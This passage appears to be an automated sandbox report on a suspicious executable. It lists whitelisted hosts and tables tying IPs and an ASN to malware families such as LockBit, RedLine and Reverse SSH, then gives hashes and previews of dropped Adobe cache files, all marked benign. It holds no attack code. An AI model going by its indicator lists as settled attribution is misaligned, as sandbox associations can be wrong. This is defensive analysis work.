Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 52.22.41.97, 52.6.155.20, 3.219.243.226, 3.233.129.217, 23.195.39.65, 199.232.210.172, 23.32.239.56, 2.19.198.27, 184.30.20.134, 2.16.168.102, 2.16.168.117, 23.32.239.9, 13.107.246.63, 23.218.208.109, 34.237.241.83, 172.202.163.200
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: T8xrZb7nBL.exe

Simulations

Behavior and APIs

Time	Type	Description
07:29:28	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
09:22:29	API Interceptor	3716047x Sleep call for process: browser_sn.exe modified
09:22:39	API Interceptor	1195x Sleep call for process: timeout.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	eszstwQPwq.ps1	Get hash	malicious	LockBit ransomware, Metasploit	Browse	199.232.210.172
	0vM02qWRT9.ps1	Get hash	malicious	LockBit ransomware, Metasploit	Browse	199.232.210.172
	#U5b89#U88c5#U52a9#U624b_2.0.8.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	fiFdIrd.txt.js	Get hash	malicious	Unknown	Browse	199.232.210.172
	5XXofntDiN.exe	Get hash	malicious	LummaC	Browse	199.232.210.172
	p3a0oZ4U7X.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	lKin1m7Pf2.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
	fKdiT1D1dk.exe	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	#U5b89#U88c5#U52a9#U624b_1.0.8.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	Support.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RSHB-ASRU	Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	document.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	tiago.exe	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	0EZ9Ho3Ruc.exe	Get hash	malicious	RedLine	Browse	194.190.152.148
	Paralysis Hack.exe	Get hash	malicious	zgRAT	Browse	194.190.153.137
	file.exe	Get hash	malicious	000Stealer	Browse	194.190.152.193
	EgNIXduB6T.exe	Get hash	malicious	Erbium Stealer	Browse	194.190.152.194
	2MNB4UhUqR.exe	Get hash	malicious	RedLine	Browse	194.190.152.20
	w9d568i4Ia.exe	Get hash	malicious	DCRat	Browse	194.190.152.128

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	5.255079938416293
Encrypted:	false
SSDEEP:	6:j2LfLM+q2PcNwi2nKuAl9OmbnIFUt8i2LboZmw+i2LbLMVkwOcNwi2nKuAl9Omb5:j2T4+vLZHAahFUt8i2Xo/+i2X4V54ZHi
MD5:	A189220DD9B1FCCEAF9438C462D20F83
SHA1:	13AA000F7C1047545D5BE2AD7EA027B681219AA4
SHA-256:	209D769B371D09889FC98C54C3CBAC45046FF682F64B6E856A5130A1FA448F56
SHA-512:	B9BDCBF182AFA24552B819EE7D5A68EAF5FABEEF1604E815E80D2D826071A62E06BF67C04155AD34B3C2EC82A4CDCAC74DA006E5E2E6567F857C4681A3537355
Malicious:	false
Preview:	2024/12/23-07:29:17.631 1fac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:29:17.635 1fac Recovering log #3.2024/12/23-07:29:17.635 1fac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	5.255079938416293
Encrypted:	false
SSDEEP:	6:j2LfLM+q2PcNwi2nKuAl9OmbnIFUt8i2LboZmw+i2LbLMVkwOcNwi2nKuAl9Omb5:j2T4+vLZHAahFUt8i2Xo/+i2X4V54ZHi
MD5:	A189220DD9B1FCCEAF9438C462D20F83
SHA1:	13AA000F7C1047545D5BE2AD7EA027B681219AA4
SHA-256:	209D769B371D09889FC98C54C3CBAC45046FF682F64B6E856A5130A1FA448F56
SHA-512:	B9BDCBF182AFA24552B819EE7D5A68EAF5FABEEF1604E815E80D2D826071A62E06BF67C04155AD34B3C2EC82A4CDCAC74DA006E5E2E6567F857C4681A3537355
Malicious:	false
Preview:	2024/12/23-07:29:17.631 1fac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:29:17.635 1fac Recovering log #3.2024/12/23-07:29:17.635 1fac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	341
Entropy (8bit):	5.186108591944854
Encrypted:	false
SSDEEP:	6:j2LS1yq2PcNwi2nKuAl9Ombzo2jMGIFUt8i2LQ1Zmw+i2L9v31RkwOcNwi2nKuAv:j2m4vLZHAa8uFUt8i2k1/+i2xD54ZHAv
MD5:	1C0AEF846AEBBD2236CE94F6D0917E20
SHA1:	C3B03EE2376E78F81CD80EDDAC2195B5D87B8C7B
SHA-256:	A12110A7A776B42FF91D4234292EA7125BAB2FF6FF25339CDA8F4401441623F1
SHA-512:	4A4D49B676931B6E1A36C922C07A8FA56A236AFB56C1EF000F83B74343397FF4224C1C426835C5A0043EB99750489FA3AA625CD0AB68C0655BF0D1A900A8DC45
Malicious:	false
Preview:	2024/12/23-07:29:17.788 ea0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:29:17.791 ea0 Recovering log #3.2024/12/23-07:29:17.794 ea0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	341
Entropy (8bit):	5.186108591944854
Encrypted:	false
SSDEEP:	6:j2LS1yq2PcNwi2nKuAl9Ombzo2jMGIFUt8i2LQ1Zmw+i2L9v31RkwOcNwi2nKuAv:j2m4vLZHAa8uFUt8i2k1/+i2xD54ZHAv
MD5:	1C0AEF846AEBBD2236CE94F6D0917E20
SHA1:	C3B03EE2376E78F81CD80EDDAC2195B5D87B8C7B
SHA-256:	A12110A7A776B42FF91D4234292EA7125BAB2FF6FF25339CDA8F4401441623F1
SHA-512:	4A4D49B676931B6E1A36C922C07A8FA56A236AFB56C1EF000F83B74343397FF4224C1C426835C5A0043EB99750489FA3AA625CD0AB68C0655BF0D1A900A8DC45
Malicious:	false
Preview:	2024/12/23-07:29:17.788 ea0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:29:17.791 ea0 Recovering log #3.2024/12/23-07:29:17.794 ea0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\40b676cd-e9ce-404f-a409-ce56bb4ad564.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.975614667422717
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq8sBdOg2HbkAcaq3QYiubSpDyP7E4TX:Y2sRds0dMHYr3QYhbSpDa7n7
MD5:	73DEF8459962BCCDD4C4B325F47FDD67
SHA1:	9D5C26008F69078D3C1D84E7A56189F3C0A62D35
SHA-256:	E0A86C0461071B47244F13FA4E431E7E15315AEBC80CD3E239E0F749066E0602
SHA-512:	A4DA3301D9A1693B5820239A768F06E34978D39C471DC7A36EF6486660788DAE153D6DE9E8B57621710BE325AD6617F1FBC5020C9981AF56FD62A5F8D5008EC3
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379516966579285","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":462605},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.975614667422717
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq8sBdOg2HbkAcaq3QYiubSpDyP7E4TX:Y2sRds0dMHYr3QYhbSpDa7n7
MD5:	73DEF8459962BCCDD4C4B325F47FDD67
SHA1:	9D5C26008F69078D3C1D84E7A56189F3C0A62D35
SHA-256:	E0A86C0461071B47244F13FA4E431E7E15315AEBC80CD3E239E0F749066E0602
SHA-512:	A4DA3301D9A1693B5820239A768F06E34978D39C471DC7A36EF6486660788DAE153D6DE9E8B57621710BE325AD6617F1FBC5020C9981AF56FD62A5F8D5008EC3
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379516966579285","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":462605},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4099
Entropy (8bit):	5.233760369244817
Encrypted:	false
SSDEEP:	96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPKH47yhv:CwNw1GHqPySfkcigoO3h28ytPP7yhv
MD5:	08EC6B1FBAF9F6B808641A190EB95A8D
SHA1:	AF19005995E8BC767460095416764D60D18ECE48
SHA-256:	E6F20C32958D7F5C921CCD118D9D9EB570E87646EC40F542403647B810952F60
SHA-512:	9CDD27246FE84FCAB9B2D153C2FA066D00E4B71FBD791203A2C22EE08A2B4FB47D00CD4B755B5A8C18BB49BCFD82BFE2092A6D42ECE4E150C26BF7FC7EFF4B6E
Malicious:	false
Preview:	...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.221879761519808
Encrypted:	false
SSDEEP:	6:j2LP1yq2PcNwi2nKuAl9OmbzNMxIFUt8i2LRx811Zmw+i2LRX6oRkwOcNwi2nKuP:j2svLZHAa8jFUt8i2Y11/+i24w54ZHAo
MD5:	C2DBB5910051D7ADE69324DB94825A79
SHA1:	3B4EAAD60A82667928FB167126605D86F5AF1917
SHA-256:	A238EC803AFCC3C33AB11ABB7AF9FF4DA4B8D01B63BF2B13CE8F009D3AD2C74B
SHA-512:	1D4864BA6CA40344C349CC91FE5EAA924DDF54E490B4E51069C37A2FE22686A5FCD5C693D3FFC51D0F39D1AC0345165F21770C08BC20354EBA73E82FF8CF02E7
Malicious:	false
Preview:	2024/12/23-07:29:17.859 ea0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:29:17.861 ea0 Recovering log #3.2024/12/23-07:29:17.862 ea0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.221879761519808
Encrypted:	false
SSDEEP:	6:j2LP1yq2PcNwi2nKuAl9OmbzNMxIFUt8i2LRx811Zmw+i2LRX6oRkwOcNwi2nKuP:j2svLZHAa8jFUt8i2Y11/+i24w54ZHAo
MD5:	C2DBB5910051D7ADE69324DB94825A79
SHA1:	3B4EAAD60A82667928FB167126605D86F5AF1917
SHA-256:	A238EC803AFCC3C33AB11ABB7AF9FF4DA4B8D01B63BF2B13CE8F009D3AD2C74B
SHA-512:	1D4864BA6CA40344C349CC91FE5EAA924DDF54E490B4E51069C37A2FE22686A5FCD5C693D3FFC51D0F39D1AC0345165F21770C08BC20354EBA73E82FF8CF02E7
Malicious:	false
Preview:	2024/12/23-07:29:17.859 ea0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:29:17.861 ea0 Recovering log #3.2024/12/23-07:29:17.862 ea0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223122923Z-228.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
Category:	dropped
Size (bytes):	66934
Entropy (8bit):	2.436424201832609
Encrypted:	false
SSDEEP:	384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
MD5:	EDF4BC620FE407C6970CDAF5585ADE74
SHA1:	FF838C5205409B571B5FA183F69EEAAE321F9AE6
SHA-256:	9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
SHA-512:	84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
Malicious:	false
Preview:	BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.439006730459014
Encrypted:	false
SSDEEP:	384:yeaci5GQiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:18urVgazUpUTTGt
MD5:	503E02698B3E9A8731889302C4CBCB46
SHA1:	32754ADD034A09C8EE280590BBEA05C2A7AF3D47
SHA-256:	1E99A4A184BCB86FFA101BB43FFA800F2699B8BCDEBA15E97E2E2BDBE170BBEA
SHA-512:	A989CAF81460EE73A8E5AACAD0A43401281F5EDDDC3DBBDE079F979BAB60BB44C13825DF192A76FBBE88B14A9946DDA4ED76429A27BBE750618768F428731CCD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.774788949899456
Encrypted:	false
SSDEEP:	48:7M2p/E2ioyViuioy3DoWoy1CABoy1p9KOioy1noy1AYoy1Wioy1hioybioyfPoyn:7Rpju30iANXKQGWb9IVXEBodRBkI
MD5:	F4F1417BBA25D54A0F160F23579D3A92
SHA1:	3F6FAE98A78415D31B87EC6CFD459DB43A1A8186
SHA-256:	EB309DEF8D9A1F45BF52504072222FF161E2D0819D4D3AED350355F6D2DE4743
SHA-512:	73C60089F54F96122D093637ECA7A795904EB3C7FF39DA94396588AC5C6E2711D70621CA3A550C00C377DBF896CA4C6A0379B1168DD276202C9285EF6B80C11E
Malicious:	false
Preview:	.... .c...../..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7485180290352824
Encrypted:	false
SSDEEP:	3:kkFklPJwhfllXlE/HT8k8XzXNNX8RolJuRdxLlGB9lQRYwpDdt:kKsZT8vNMa8RdWBwRd
MD5:	6EB414C3FDF0BD94E9706676E3915390
SHA1:	F1D93DA7ACC9079519203BFE75324C15BE6AF080
SHA-256:	B8D0FD7CC97372083F46394509ED14BC52352E2F5050707150539B0B03F839AB
SHA-512:	F9BD8EA25CD1E23266888771C1DDBD22EBBE856052B120802C4FD5EFAFA8644C155A2CF05BD71118005F4B127C8ED6004A69C29B599A6355AD5BB3D04CEB521B
Malicious:	false
Preview:	p...... ..........KO6U..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.238004231589766
Encrypted:	false
SSDEEP:	6:kKDn9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:CDImsLNkPlE99SNxAhUe/3
MD5:	280AAB2CA222219C272C013EE1913E75
SHA1:	0803C9215B1DE7CE416698E1727B2F16D12ED96C
SHA-256:	55A8A1C7CF977B5795CE068E40752D0D37D97C6092982FC3293F58F6B5545A63
SHA-512:	8729C90269994B9C196C366780F8A51A6A2BA705DF1318C43C9EB207FAB586BD17BDA109D2B28973B52C19E6471C2A56650F72A8215E0D01008E6AFEDEC25FAA
Malicious:	false
Preview:	p...... ........ZF8b6U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.379988058598537
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJM3g98kUwPeUkwRe9:YvXKXWIf5WsdTeO+sGMbLUkee9
MD5:	3F32F3E598D7140EF3FA4F395DB6E25B
SHA1:	1A2D5ED0445BDF40D7AB25843D65D6759BB004D4
SHA-256:	B46C25AE6E2D2B0A6F7CAC4AE6E01BFD67876EAE1D372D1BFF859034863ECD37
SHA-512:	76C60C54448EC75E538212CF994D0E912F0A3DAD5F28E35DD4523BA68B115D9DB0C110D5F761E494AED2C39BCC4320051955C569E2FE7E9F892C62DFAC958835
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.314972506359147
Encrypted:	false
SSDEEP:	6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfBoTfXpnrPeUkwRe9:YvXKXWIf5WsdTeO+sGWTfXcUkee9
MD5:	CA07D75546B87BC8EDCA04D7BF3F21A5
SHA1:	CF671C154D3E7C733714BDE8B01973C077652A85
SHA-256:	FB934F9E5A00B7235AA2A6D387E35EDC4224A28E2B282E30D3DD38064C6D07ED
SHA-512:	E30A297520F5F45E571D2FC2BBA7EDC746BA4D3DE7043EEA7851AFB9D0D1A48D8D6B066B40803F2E03E4029521F3BB877FE20C66D2FDD5B338139211A0811EDE
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.292822599936216
Encrypted:	false
